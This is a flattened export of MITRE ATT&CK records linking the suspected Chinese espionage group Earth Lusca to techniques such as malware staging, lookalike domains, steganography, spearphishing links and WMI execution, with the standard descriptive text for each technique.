----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--3ee16395-03f0-4690-a32e-69ce9ada0f9e
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has staged malware and malicious files on compromised web servers, GitHub, and Google Drive.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--0e837480-f359-4bdc-875a-d953027d17b0
revoked : False
technique : Upload Malware
technique_description : Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.

Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)

Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1608.001
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Internet Scan: Response Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has registered domains, intended to look like legitimate target domains, that have been used in watering hole attacks.(Citation: TrendMicro EarthLusca 2022) 
relationship_id : relationship--5ce84367-05cc-446e-a744-08a46f103552
revoked : False
technique : Domains
technique_description : Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.

Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)

Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)

Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1583.001
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Domain Name: Passive DNS', 'Domain Name: Domain Registration', 'Domain Name: Active DNS']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used compromised web servers as part of their operational infrastructure.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--ff6f4b5b-1b5f-4f8f-9307-345a3c278151
revoked : False
technique : Server
technique_description : Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.

Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1584.004
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Internet Scan: Response Content', 'Internet Scan: Response Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired multiple servers for some of their operations, using each server for a different role.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--dd033098-eb56-4c17-90d7-c7673f04bcd6
revoked : False
technique : Server
technique_description : Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.

Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1583.004
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Internet Scan: Response Metadata', 'Internet Scan: Response Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used steganography to hide shellcode in a BMP image file.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--09f5abff-ad09-4d5b-a6c4-612d4171c089
revoked : False
technique : Steganography
technique_description : Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.

[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) 

By the end of 2017, a threat group used <code>Invoke-PSImage</code> to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)  
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1027.003
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['File: File Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006)  has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--fff3195c-ef40-4e11-b0f3-f1a849b2b316
revoked : False
technique : Malicious Link
technique_description : An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1204.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['File: File Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation']
permissions_required : ['User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used a VBA script to execute WMI.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--85216e27-5d58-4d89-8b04-3ef50ed14f95
revoked : False
technique : Windows Management Instrumentation
technique_description : Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015)

An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1047
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Network Traffic: Network Connection Creation', 'Process: Process Creation', 'WMI: WMI Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
